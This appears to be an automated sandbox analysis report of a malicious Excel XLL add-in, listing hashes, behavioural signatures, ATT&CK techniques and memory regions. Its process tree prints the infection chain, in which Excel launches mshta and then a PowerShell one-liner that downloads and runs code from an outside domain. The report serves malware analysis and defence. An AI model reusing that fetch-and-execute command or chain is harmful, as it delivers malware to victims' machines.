Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 16:23

General

  • Target

    e63b75b78818d3960063487508c86c0eebf568819abe8cdc5d3b5ab76770ece3.xll

  • Size

    12KB

  • MD5

    351b24139176f468b9af0031fab5f5a7

  • SHA1

    29ba3efe50158d61a019fd8643edb7cac31754e6

  • SHA256

    e63b75b78818d3960063487508c86c0eebf568819abe8cdc5d3b5ab76770ece3

  • SHA512

    c6228d4eec30bebe32f4fdc00b42091134e9819a2b09c38de5420e1e8220ada08090fc1cef2f7e610e7cff4f8b8f1e8e1d400933d052bde18bf8c4a3211643aa

  • SSDEEP

    192:bL29RBzDzeobchBj8JONpON9rufrEPEjr7Ahu:H29jnbcvYJOCXufvr7Cu

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e63b75b78818d3960063487508c86c0eebf568819abe8cdc5d3b5ab76770ece3.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:936
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4460

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DT6JO3EC\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khynsbya.5kg.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\e63b75b78818d3960063487508c86c0eebf568819abe8cdc5d3b5ab76770ece3.xll
    Filesize

    12KB

    MD5

    351b24139176f468b9af0031fab5f5a7

    SHA1

    29ba3efe50158d61a019fd8643edb7cac31754e6

    SHA256

    e63b75b78818d3960063487508c86c0eebf568819abe8cdc5d3b5ab76770ece3

    SHA512

    c6228d4eec30bebe32f4fdc00b42091134e9819a2b09c38de5420e1e8220ada08090fc1cef2f7e610e7cff4f8b8f1e8e1d400933d052bde18bf8c4a3211643aa

  • memory/936-20-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-8-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-5-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-16-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-9-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-1-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-10-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-4-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-12-0x00007FFEFC4F0000-0x00007FFEFC500000-memory.dmp
    Filesize

    64KB

  • memory/936-7-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-13-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-15-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-14-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-19-0x00007FFEFC4F0000-0x00007FFEFC500000-memory.dmp
    Filesize

    64KB

  • memory/936-17-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-21-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-23-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-22-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-18-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-0-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-6-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-3-0x00007FFF3EF83000-0x00007FFF3EF84000-memory.dmp
    Filesize

    4KB

  • memory/936-11-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-92-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-89-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-90-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-91-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-88-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-2-0x00007FFEFEF70000-0x00007FFEFEF80000-memory.dmp
    Filesize

    64KB

  • memory/936-72-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/936-71-0x00007FFF3EEE0000-0x00007FFF3F0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/4460-62-0x00000000069B0000-0x00000000069FC000-memory.dmp
    Filesize

    304KB

  • memory/4460-63-0x0000000007FA0000-0x000000000861A000-memory.dmp
    Filesize

    6.5MB

  • memory/4460-64-0x0000000006E70000-0x0000000006E8A000-memory.dmp
    Filesize

    104KB

  • memory/4460-61-0x0000000006980000-0x000000000699E000-memory.dmp
    Filesize

    120KB

  • memory/4460-60-0x00000000064E0000-0x0000000006837000-memory.dmp
    Filesize

    3.3MB

  • memory/4460-51-0x0000000006370000-0x00000000063D6000-memory.dmp
    Filesize

    408KB

  • memory/4460-50-0x00000000061D0000-0x0000000006236000-memory.dmp
    Filesize

    408KB

  • memory/4460-49-0x0000000005AF0000-0x0000000005B12000-memory.dmp
    Filesize

    136KB

  • memory/4460-48-0x0000000005B30000-0x000000000615A000-memory.dmp
    Filesize

    6.2MB

  • memory/4460-47-0x00000000054C0000-0x00000000054F6000-memory.dmp
    Filesize

    216KB